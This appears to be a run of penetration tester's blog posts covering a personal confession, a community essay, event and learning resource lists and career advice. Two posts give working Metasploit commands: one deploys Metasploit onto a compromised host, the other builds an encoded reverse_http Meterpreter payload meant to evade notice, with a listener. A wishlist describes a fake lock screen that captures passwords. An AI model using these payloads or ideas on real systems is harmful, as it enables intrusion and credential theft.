When I was in middle school, I told a lie. I was so good at telling lies, and remembering even the infinite details of these lies that I could make them believable. Later in life, I learned that this skill was called “Social Engineering ;–)”, but back to the story; I told everyone that I had won a shopping spree at “Incredible Universe”, now named “Fry’s”. Even the teacher believed me. The kids made lists of what they wanted me to get for them, and I strung it on for way too long. You tell a lie like that though and you get caught eventually. As I did, and learned a hard lesson. At that time in my life I was going through some really rough waters, and having everyone “like” me for even that finite amount of time, helped me cope. Does that make it right? Definitely not. But I remember that experience to this day.

Why tell you all this? Because this post is both self serving (as it will make it impossible for me to lie about the following any more) and apologetic. I have lied to those I call friend. Recently these lies were told to some very good friends and I had my first physical reaction to the guilt of telling them. I was literally unable to eat that night. Enough stalling and making excuses here they are:

1. I am not a Marine Scout Sniper, nor ever been to Marine Scout Sniper school. I truly wish I had been and admire all those who have made it through.

2. I have never been to SEARS training.

3. The gentleman by the name of Fuzzy, was a gas attendant with me. Great guy, but he wasn’t an explosives expert in Okinawa to the best of my knowledge.

4. Never met the Rock Marines of Korea, or for that matter trained with any other foreign military.

5. I have never been to a Masseuse school, but I give great massages, ask anyone.

6. I was never a bouncer in NY or lived there. Only been there twice on vacation, but love the city, and the Yankees (although I have no idea who plays for or owns the team) nor do I follow them, or for that matter any sports team.

7. I have been a bartender, but it was for a base beach snack bar that I followed mix solutions on a printed paper for, so I know absolutely nothing about mixed drinks.

I have never told these lies during an interview or any other formal means, but I have told them to friends and acquaintances. I would like to apologize to all of them, here and now. I originally thought I should email them, but decided this public forum was a better and a bit more transparent.

Are the lies damaging to anyone but me? Did I have to tell anyone? No, not really. Would someone figure out that they were lies? There is a small chance. But that’s not the point. I try to be as brutally honest as I can with people, and I want that to extend to things about myself.

Think of me what you will, and I am deeply sorry if I misrepresented myself to you in any fashion at any time.

Rob

Let me preempt this post with the following facts: I am a white male veteran with amazing parents. I went to a good school, and was never under-valued by the people I cared about. I fit no minority profiles in other words. I tell you this so that you can latch on to it as why I don’t understand anything in your rebuttal. But I think this gives me a unique view on the issue.

“People are stupid. They will believe a lie because they want to believe it’s true, or because they are afraid it might be true.”

——Wizard’s First Rule – By Terry Goodkind

This post was a long time coming. I feel pretty passionate about “my community”. I don’t say that in a lead-follower sense, but more of a Kum Ba Ya one. The feather that pushed this post over the edge into existence is @shazzzam’s post “Female stereotyping in security research” which was in response to the Saphead’s Binary 300 solution cartoon. But please keep in mind, this only set the cogs in motion for this post that I’ve been thinking about way before this cartoon came into existence.

Sexism, and for that matter, any “-ism” is flawed on both sides. Now, Shazzzam went no where near the extreme that most of the “-ists” do for their “-isms”, she actually had some great points however, that doesn’t excuse the presumptions she made. Pusscat, Hypatia, and Shazzzam (+ the many other women in IT) have made enormous contributions, just as males have. Hackers are hackers. The only thing we measure by is the brain in your noggin, but I’ll go into that later. Where Shazzzam went wrong is that she assumed that this cartoon was depicting the female falsely, which may or may have not been the case. She then used it as a soap box to express her hate for people who make presumptions about her mental abilities because of her sex.

(Damn men, “they” are always assuming I’m an idiot)

“What’s the difference between a WM (woman-Marine) and a hooker? Hooker gets paid in the morning and the WM gets paid on the 1st and 15th.” ——old Marine joke, origin unknown

While this is a crude joke, it illustrates a point. During my time in the Marine Corps I witnessed female Marines that were useless, ones that slept around, and those that outshined their peers, male and female alike. But guess what, those that did well were sadly the minority in my experiences. Now you might hinge your argument on that it’s my biased opinion that ‘saw’ what I wanted to see, and you very well could be right. I hardly consider myself perfect, but lets just say for the sake of argument that what I say is true. We all make assumptions, you are not perfect either, is it so wrong to bet on odds or experience when making assumptions? It’s human nature, but keeping an open mind is the key to this. How many Mark Dowds, HDs, Shazzzams and Pusscats are there in this world? How many times have you complained about an idiot boss or co-worker? How many times have you complained about script kiddies? or whatever you complain about on an assumption or amassed experience.

(Stupid woman, “they” never do anything right, can’t even drive straight)

This brings us to my favorite part, and why I love our community. Hackers are hackers:

(original – phrak) We exist without skin color, without nationality, without religious (or sexual) bias… and you call us criminals. You build atomic bombs, you wage wars, you murder, cheat, and lie to us and try to make us believe it’s for our own good, yet we’re the criminals.

Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for.

I am a hacker, and this is my manifesto. You may stop this individual, but you can’t stop us all… after all, we’re all alike.

+++The Mentor+++

I’ve taken the liberty of adding “(or sexual)” to this famous manifesto. But I think it stays in the spirit of it’s writer’s intent. This is my religion. I think all “ists” have forgotten what they fight for and just fight to be right. My suggestion? Make a mental note of those who have forgotten how to truly be what they claim as a title. For they will out themselves time and time again, and be destined to fail.

(Damn kids. They’re all alike.)

EDIT: Nikita has done an excellent job of expressing what I so obviously failed at doing: http://attrition.org/news/content/09-07-14.001.html

Looking for local events?

I’ve gotten a lot of people asking me recently where the local events are in DC, and I almost every time turn them to the awesome http://www.novainfosecportal.com/ which is hands down the best source for local events for the DC-NoVA-MD area, not just NoVA.

Grecs (follow him on twitter) does an amazing job at keeping it up to date and filled with every event possible. (Subscribe to his google calendar of events, get the RSS feed.. all good stuff)

But there are other resources too:

DojoSec – http://www.dojosec.com/– run by the amazing Marcus J. Carey who recently joined the PaulDotCom Security Weekly crew. DojoSec is a Monthly min-conference with 1 track and some of the best speakers in the local area, definitely worth

The Shmoo Group hosts the recently revived Security Geeks mailing list:  http://lists.shmoo.com/mailman/listinfo/secgeeks

I run a luncheon that you can get on the list simply by emailing me (mubix hak5.org) or commenting here if you wish.

Another site to keep up on is http://infosecevents.net/ run by GGEE has a more broad scope of events, not just in the area.

Hope this helps more people find ways of getting connected with the community.

Well, sorta…

I created a meterpreter script that takes the cygwin bundled version of Metasploit inside of a NullSoft installer that HD Moore created and deploys it using meterpreter to the compromised host, extracts/installs it, and runs the shell. Now I left this intentionally open so that you could package your own cygwin bundle (possibly with nmap and netcat), for your own evil fun.

Thanks defintely go to Carlos Perez (Dark0perator) and HD Moore for their help getting this bad boy working right.

You can download the script here: https://github.com/mubix/stuff/blob/master/metasploit/deploymsf.rb

You can download the cygwin installs from the metasploit website:

• 13mb FULL framework: framework-3.3-dev.exe
• 5mb MINI (just msfconsole): mini-3.3-dev.exe

And here is what it looks like:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40

meterpreter > run deploymsf -f framework-3.3-dev.exe  
[*] Running Meterpreter MSFp Deploytment Script.....  
[*] Uploading MSFp for for deployment....  
[*] MSFp uploaded as C:DOCUME~1mubixLOCALS~1Temp12681.exe  
[*] Installing MSFp...........  
[*] Done!  
[*] Installation Complete!  
[*] Running cygwin shell channelized...  
[*] Channel 18 created - Type: interact 18 to play  
[*] Be warned, it takes a bit for post setup to happen  
[*] and you will not see a prompt, try pwd to check  
meterpreter > interact 18  
Interacting with channel 18...  
  
[*] Configuring multi-user permissions for first run...  
[*] Configuring the initial user environment...  
pwd  
/home/mubix  
ls  
msfconsole  
*** Metasploit only has EXPERIMENTAL support for Ruby 1.9.1 and newer, things may break!  
*** Please report bugs to msfdev[at]metasploit.com  
[-] ***  
[-] * WARNING: No database support: LoadError no such file to load -- active_record  
[-] ***  
  
## ### ## ##  
## ## #### ###### #### ##### ##### ## #### ######  
####### ## ## ## ## ## ## ## ## ## ## ### ##  
####### ###### ## ##### #### ## ## ## ## ## ## ##  
## # ## ## ## ## ## ## ##### ## ## ## ## ##  
## ## #### ### ##### ##### ## #### #### #### ###  
##  
  
=[ msf v3.3-dev  
+ -- --=[ 379 exploits - 231 payloads  
+ -- --=[ 20 encoders - 7 nops  
=[ 156 aux  
  
msf >GAME OVER

There are a lot of tools that I find in my endeavors would be really helpful, but can’t find on the net for whatever reason.

1. A portable version of of tshark that has ARP spoofing capabilities. I want to be able to drop the file, issue the arguments and pull the pcap back.

2. A application that can sniff traffic from a specific process. Metasploit’s keylogger is sort of there as it only pulls keys from the process of which it is attached (DLL is to ‘fault’ for this). And Process Hacker is also pretty close, (Process Explorer does a TCPVIew like show of the connections currently happening).

3. An nmap script that sees port 445 open and tries pass the hash, and token passing to run a specified executable. I believe tebo was developing a psexec scanner for Metasploit, but it hasn’t been released as of yet.

4. A meterpreter script that sets the a all user GPO setting for wallpaper and forces the update. (For calling-card notifications during pen-tests)

5. A password list generator that would take URLs, and files (pulling metadata where applicable, strings in other cases). And churn out a dictionary, and also ask if you would like to start generating a Rainbow Table for that specific dictionary.

6. A meterpreter module like “Echo Mirage” by the BeEF guys, sort of like an iptables injection that modifies/accepts/denys packets to a specific process

7. This is Kevin Johnson’s idea but it should be posted: A standard XMLish format for all Web Application Scanners so that the tools interoperate. One spider session can be loaded into another tool and have it’s auditing system check it, instead of being confined too one tool.

8. A screen saver that imitates the screen saver lockout event and has the user login (and has it fail twice by default for “Password Validation ;–)”)  and then allows them back in, capturing those password. (Usually a user will try a couple different passwords so you might be able to glean other credentials to use). It could also have an option to state. “Account Locked, You must be an Administrator to login” so that they call an admin in to unlock it ;–)

I’ll leave it at that for now. Anyone interested in coding it ?

Matt, from the Exotic Liability forums, posed a suggestion for a episode: “Getting started [in] reverse engineering hardware drivers?”. I thought this was an interesting topic to attack so, I dug a bit into my RSS feed pile of goo and compiled this list of links. Hope this helps Matt.

Individuals —–

• Skywing – http://www.nynaeve.net/
• Egypt – http://0xegypt.blogspot.com/
• Yoni – http://blogs.msdn.com/michael_howard/
• Raymond Chen – http://blogs.msdn.com/oldnewthing/
• Sia0 – http://blogs.msdn.com/michkap/
• Rob P – http://geekswithblogs.net/robp/Default.aspx
• Quantam – http://qstuff.blogspot.com/
• Phn1x – http://hamsterswheel.com/techblog/
• Halavar Flake – http://addxorrol.blogspot.com/
• Pedram – http://pedram.redhive.com/blog
• Tyler Shields – http://www.donkeyonawaffle.org/
• Wesley Shields – http://www.atarininja.org/
• Peter Wieland – http://blogs.msdn.com/peterwie/
• Michael Howard – http://blogs.msdn.com/michael_howard/
• Doron Holan – http://blogs.msdn.com/doronh/
• Nico Waisman – http://eticanicomana.blogspot.com/
• Dmitry Vostokov – http://www.dumpanalysis.org/blog/
• Nicolas Sylvain – http://nsylvain.blogspot.com/
• Alex Ionescu – http://www.alex-ionescu.com/
• Mattheiu Suiche – http://www.msuiche.net/
• Larry Osterman – http://blogs.msdn.com/larryosterman/
• Koby Kahane – http://kobyk.wordpress.com/
• Jason Geffner – http://malwareanalysis.com/communityserver/blogs/geffner/default.aspx
• Ero Carrera – http://blog.dkbza.org/
• Dino Dai Zovi – http://blog.trailofbits.com/
• Ilja – http://blogs.23.nu/ilja/
• Nate Lawson – http://rdist.root.org/
• Mark Russinovich – http://blogs.technet.com/markrussinovich/
• Jose Nazario – http://www.wormblog.com/
• Jonathan Morrison – http://blogs.msdn.com/itgoestoeleven/
• John Robbins – http://www.wintellect.com/cs/blogs/jrobbins/default.aspx
• Ilias Tsigkogiannis – http://blogs.msdn.com/iliast/
• Daniel Reynaud – http://indefinitestudies.org/
• Joanna Rutkowska – http://theinvisiblethings.blogspot.com/
• Matthieu Kaczmarek – http://www.loria.fr/~kaczmare/index.en.htm
• Silvio Cesare – http://silviocesare.wordpress.com/
• Philippe Beaucamps – http://www.loria.fr/~beaucphi/
• Debugging Toolbox – http://blogs.msdn.com/debuggingtoolbox/
• Fravia’s saved works (RIP) – http://www.woodmann.com/fravia/index.htm

Groups —–

• Offensive Computing – http://www.offensivecomputing.net/
• The Cover of Night – http://www.thecoverofnight.com/blog/
• LHS – http://lhs.loria.fr/
• NT Debugging – http://blogs.msdn.com/ntdebugging/
• Hex Blog – http://www.hexblog.com/
• Engineering for Fun – http://blog.engineeringforfun.com/

Company —–

• OpenRCE – http://www.openrce.org/articles/
• DV Labs – http://dvlabs.tippingpoint.com/blog/
• Matasano – http://www.matasano.com/log/
• VeraCode – http://www.veracode.com/blog/
• Trend Micro – http://blog.trendmicro.com/

Forums —–

• Reverse Engineering – http://community.reverse-engineering.net/index.php
• OpenRCE – http://www.openrce.org/forums/
• Assembly Forums – http://www.asmcommunity.net/board/

Sandboxing and Analysis —–

• Joe Box – http://www.joebox.org/
• Virus Total – http://www.virustotal.com/
• Wepawet – http://wepawet.cs.ucsb.edu/
• F-Secure –http://www.f-secure.com/en_US/security/security-lab/
• Anubis – http://anubis.iseclab.org/
• Jotti – http://virusscan.jotti.org/en
• Sunbelt CWSandbox – http://www.sunbeltsecurity.com/Submit.aspx?type=cwsandbox&cs=A41CD150B37359889A553671CBFD2360

Misc —–

• Code Breakers Journal – http://www.codebreakers-journal.com/
• The Art of Assembly – http://webster.cs.ucr.edu/AoA/DOS/AoADosIndex.html
• Intel Processor Instruction Set A-M/N-Z – http://www.intel.com/products/processor/manuals/
• WASM.ru with translation – http://66.196.80.202/babelfish/translate_url_content?lp=ru_en&url=http://www.wasm.ru&.intl=us

Update on 2009-10-11 06:27 by Rob Fuller

The Malware Distribution Project posted a comment a while back letting us know of their project so that it could be added to the list:

• MD:Pro – http://frame4.net/

And their ‘more up-to-date’ Fravia archive: http://fravia.frame4.com/

Val Smith recently wrote a post on the new Attack Research / carnal0wnage blog titled:
”Security Conferences, pen tests and incident response”

Here are my thoughts on what he wrote:

In paragraphs 2-6 he talks about two points. The first being that Hacker Conferences have become sort of commercialized with most speakers going for their day in the lime light or to pimp some product/0day. And the second being a lot of the talks are things that most can’t go home / back to work and test out or implement.

I agree with him on both points.

On the first point I think that one detail was left out of this evaluation. Size. Back when DEFCON was <500 people, almost everyone knew each other. 90% of those attending had the passion, had the fire for that what makes our line of work such an art. Now that our community has become “popular”, that percentage is around 20-30%. These numbers aren’t based on any stats, just something that I have been observing as well.

On the second point, my first security conference was ShmooCon ‘06. I was glued to might seat in each talk I attended, and in just 3 short years I have seen EXACTLY what he’s talking about. I used to have to decide between awesome talks in the same hour. Now I actually find times where I’m not interested in anything being presented for that hour. But, rooms still get packed so I guess that’s just my own pickiness.

Penetration Testing and Incident is the second portion of his post and I really think he’s hit the nail on the head, Pen Testing and Incident Response should work closely together. I want to throw Vulnerability Assessment and Forensics into the mix as well, feeding each other, sharing data, and assisting. The segmentation of duties / teams is killing collaboration.

Lets get back to the basics, and really show what this community is capable of.

I posted this walkthrough to the Metasploit mailing list, but thought that it would serve well here as well. Especially with the recent iPhone 3.0 “Special” download spam I recently received. The binary comes out to a whopping 97 bytes for the stager. Would be a blazing fast download and coupled with the IExpress “hack” would make for an very hard to spot payload.

A really down and dirty explination of what PassiveX is and why it’s useful in this sort of situation is that instead of making a direct connection back to you, it uses an iexplorer process with a cool ActiveX control to talk back. So someone looking for a rogue process will only see Internet Explorer open and talking over port 443 (as specified).

(props to skape for writting PassiveX and @NatronKeltner for kicking in the latest tweaks to make it work with IE7/IE8)

Here are the options for msfpayload:

1

Usage: ./msfpayload <payload> [var=val] <S[ummary]|C|P[erl]|[Rub]y|R[aw]|J[avascript]|e[X]ecutable|[V]BA>

And msfencode’s options if you chose to use it as I demonstrate below. However, encoding happens by default with msfpayload (IIRC):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

./msfencode -h
Usage: ./msfencode <options>
OPTIONS:
-a <opt> The architecture to encode as     
-b <opt> The list of characters to avoid: 'x00xff'      
-c <opt> The number of times to encode the data      
-e <opt> The encoder to use      
-h Help banner      
-i <opt> Encode the contents of the supplied file path      
-l List available encoders      
-m <opt> Specifies an additional module search path      
-n Dump encoder information      
-o <opt> The output file      
-s <opt> The maximum size of the encoded data      
-t <opt> The format to display the encoded buffer with (c, elf, exe, java, perl, raw, ruby, vba)

Here we create the PassiveX payload. Note the PX options instead of the LHOST/LPORT:

1
2

./msfpayload windows/reflectivemeterpreter/reverse_http PXHOST=192.168.1.100 PXPORT=443 PXURI=/ R | ./msfencode -t exe -o /tmp/maliciouspayload.exe
[*] x86/shikata_ga_nai succeeded with size 97 (iteration=1)

Now that we have our “malicious payload” in /tmp we get our listener ready (you can use msfcli as well, I just like msfconsole because it provides me more flexibility):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

./msfconsole

 

_     
| | o      
_ _ _ _ _|_ __, , _ | | __ _|_      
/ |/ |/ | |/ | / | / _|/ _|/ / _| |      
| | |_/|__/|_/_/|_/ / |__/ |__/__/ |_/|_/      
/|      
|

 

=[ msf v3.3-dev     
+ -- --=[ 376 exploits - 234 payloads      
+ -- --=[ 20 encoders - 7 nops      
=[ 153 aux

 

msf > use multi/handler     
msf exploit(handler) > exploit -h

(I’m showing you ‘exploit’s options because a lot of people don’t know they exist. With two lines you can start your listener (use, then exploit):**

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

Usage: exploit [options]     
Launches an exploitation attempt.

OPTIONS:     
-e <opt> The payload encoder to use. If none is specified, ENCODER is used.      
-h Help banner.      
-j Run in the context of a job.      
-n <opt> The NOP generator to use. If none is specified, NOP is used.      
-o <opt> A comma separated list of options in VAR=VAL format.      
-p <opt> The payload to use. If none is specified, PAYLOAD is used.      
-t <opt> The target index to use. If none is specified, TARGET is used.      
-z Do not interact with the session after successful exploitation.

msf exploit(handler) > exploit -j -z -p windows/reflectivemeterpreter/reverse_http -o PXHOST=0.0.0.0,PXPORT=443,PXURI=/,ExitOnSession=False

[*] Exploit running as background job.     
[*] PassiveX listener started.      
[*] Starting the payload handler...

 msf exploit(handler) >

Listener ready to go. I chose IP: 0.0.0.0 just to make things easy. Just send off maliciouspayload.exe to your target and you’re set.

I recently posted a blog post to Exotic Liability’s website with the same title, and I realized that it would make a great thing to post to here, and update regularly, or just put it on the wiki I keep saying that I get going here. Enough rambling, here is how you can get your fill of security:

Podcasting:

• GetMon – http://www.getmon.com/ – This is a great site because you can download or listen to any of the security podcasts right from their site if you want to.
• HackerMedia – http://www.hackermedia.org/ – They put together like podcasts into different categories, and they overlap. So if you want the “Linux” feed, you’ll get podcast A, B, and C. But maybe podcast C does Linux security, so if you subscribe to the “Security” feed, you might get C, E, and G. You can also get the everything feed

Bloggers (RSS Feeds):

• Security Bloggers Network – http://www.securitybloggers.net/ – A consolidated feed of a HUGE list of security blogs

Twitter:

• Security Twits – http://www.security-twits.com/ – A long list of security related twitter accounts. From people to events, to companies.

Places to learn:

• The Academy Pro – http://www.theacademypro.com/
• Learn Security Online – http://www.learnsecurityonline.com/
• Free IT Security Training – http://www.freeitsecuritytraining.com/
• Virtual Training Environment by Carnegie Mellon – https://www.vte.cert.org/vteweb/

Challenge Sites and Sites that are OK to attack:

(Make sure you know which is which before you haul off and start attacking though)
(Most of these stolen from Chris Nickerson’s reply to Show 17 Links blog post)

• http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project
  http://testasp.acunetix.com/Default.asp
• http://test.acunetix.com/
• http://hackme.ntobjectives.com/
• http://www.foundstone.com/us/resources/proddesc/hacmeshipping.htm
• http://www.foundstone.com/us/resources/proddesc/hacmecasino.htm
• http://www.foundstone.com/us/resources/proddesc/hacmebooks.htm
• http://www.foundstone.com/us/resources/proddesc/hacmetravel.htm
• http://lampsecurity.org/capture-the-flag-5
• http://zero.webappsecurity.com/
• http://www.hackertest.net/
• http://www.hackthissite.org/
• http://www.mavensecurity.com/WebMaven.php
• http://ha.ckers.org/challenge/
• http://ha.ckers.org/challenge2/
• http://demo.testfire.net/
• http://scanme.nmap.org/
• http://www.hellboundhackers.org/
• http://www.overthewire.org/wargames/
• http://roothack.org/
• http://heorot.net/
• http://www.irongeek.com/i.php?page=security/mutillidae-deliberately…
• http://wocares.com/xsstester.php
• https://how2hack.net
• http://hax.tor.hu/
• http://www.bright-shadows.net/
• http://www.dareyourmind.net/
• http://hackergames.net/
• http://www.hackquest.com/
• http://www.darkmindz.com/
• http://www.caesum.com/game/
• http://www.net-force.nl/
• http://www.osix.net/
• http://www.mibs-challenges.de/
• http://projecteuler.net/
• http://uva.onlinejudge.org/
• http://ace.delos.com/usacogate

So now you have absolutely ZERO reason to have one moment of time on your hands ;–)

Know of another good resource? Post a comment.

UPDATE: ethicalhack3r from http://www.ethicalhack3r.co.uk pointed me to his project called “Damn Vulnerable Web App”. You can find it on Sourceforge here: http://sourceforge.net/projects/dvwa/

Update on 2009-12-09 05:30 by Rob Fuller

A must larger post was made:

http://www.linux-ninja.com/infosec-self-education-resources/

there are a ton of resources out there… now you don’t even have to google for them…

First of all, here is my slide deck from DojoSec with a couple added slides, words, and slight modifications:

I have put this article off quite a few times due to some very cool and interesting things happening in our field as it applies to getting a job. That, and Matt Johansen beat me to it with his blog post titled: “A lot of Information Security Career Advice”, which I highly recommend you check out and add to your RSS reader.  So instead of rewriting things that other people have already covered I’ll just post the links to them:

We start our journey as any real hacker would, with the “Hacker Handle Generator”.  And since I am more of an Audio/Visual Leaner  let’s start off with “Exotic Liability Episode 10: Advice” Where Ryan Jones, DJ Jackalope, and Chris Nickerson, of “Tiger Team)” fame, fortune and power,  call back Michigan Justin and talk at length about how to start out in the community. We also have Don Donzal from EthicalHacker.net who talks about “DIY Career in Ethical Hacking” (MP3 / SLIDES), and about 16 tips from “Ugly Resumes get Jobs!” on Slideshare. But this A/V setup wouldn’t be complete if I didn’t tell you guys where you can get all kinds of videos actually teaching you security so that you can have a leg up on everyone else. Head on over to TheAcademyPro.com where you can watch 1-5 minute videos on everything from configuring Snort and exploiting systems with Metasploit, to configuring Sourcefire 3D and destroying the world with Core Impact. Another site to bookmark is SecurityTube.net. The guys there work their fingers to the bone to locate security videos across the net and put them all in one central pace for you to access.

Now on for those people who like to do all that “reading” stuff.  First head on over to the Security Catalyst for Part 1 and Part 2 of “Career Advice for Security Geeks” and Paul Asadoorian’s post titled “Getting Started In Information Security How-To” and Kees Leune’s post titled “Tips for Getting Started in Information Security”, and if you are really feeling froggy, read all 4+ years (only 6 or so pages don’t worry too much) of the discussion on the Defcon forums: “Getting started in the security field”

Finally, sticking with the theme that I try to keep going on this blog I want to give you something new to digest:

James Arlen (aka myrcurial) does a talk at Notacon about going from BlackHat to BlackSuit

LifeHacker’s “Top 10 Tools for landing a better job”

Aaron Crowe writes about “How to avoid being scammed in a job hunt”

Lee Kushner writes about “Wanting a Job Too Much”

Two Mashable articles: “How to find a Job on Twitter” and “How to exchange Biz cards on Twitter”

But I wanted to close with some advice that a lot of people have a hard time with. And that is how to talk dollars, and how to do it well.  And Jack Chapman is certainly the guy to learn from. Check out a write-up on him on GetRichSlowly.org titled “Negotiating Your Salary: How to Make $1,000 a Minute” (which is the title of Chapman’s book). And Chapman’s site where he has tons of YouTube videos of tips that he describes in the book.

Sorry this is a bunch of links, and if you guys would like me to explain each slide in my Couch to Career deck I’ll make another post about it.